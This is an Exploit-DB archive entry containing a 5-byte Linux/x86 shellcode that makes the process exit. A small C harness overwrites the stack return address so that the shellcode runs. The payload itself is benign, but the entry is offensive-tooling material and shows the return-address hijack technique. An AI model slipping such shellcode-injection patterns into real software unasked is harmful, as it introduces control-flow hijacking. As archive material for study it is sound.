Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)

EDB-ID:

13394

CVE:

N/A


Author:

izik


Platform:

Linux_x86

Date:

2006-01-21


/*
 * (linux/x86) normal exit w/ random (so to speak) return value - 5 bytes
 * - izik <izik@tty64.org>
 */

char shellcode[] = 

	"\x31\xc0"              // xor %eax,%eax 
	"\x40"                  // inc %eax 
	"\xcd\x80";             // int $0x80 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}

// milw0rm.com [2006-01-21]